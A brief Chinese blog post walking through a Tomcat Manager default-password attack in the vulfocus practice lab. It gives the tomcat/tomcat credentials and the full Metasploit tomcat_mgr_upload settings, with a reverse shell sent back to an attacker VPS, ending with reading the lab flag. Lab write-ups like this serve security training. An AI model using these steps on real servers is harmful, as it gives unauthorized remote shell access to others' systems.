Tomcat弱口令
背景:
Zab Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell。
漏洞编号:
影响版本:
弱口令
复现步骤:
1,打开漏洞环境vulfocus
2,访问URL点击Manager App
3,验证弱口令,输入默认账号密码tomcat tomcat
4,使用msf进入exploit/multi/http/tomcat_mgr_upload模块
5,依次设置
set rhost vulfocus.fofa.so
set rport 60231
set httpusername tomcat
set httppassword tomcat
set lhost VPS IP
set lport 6666
6,run
7,查看flag
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效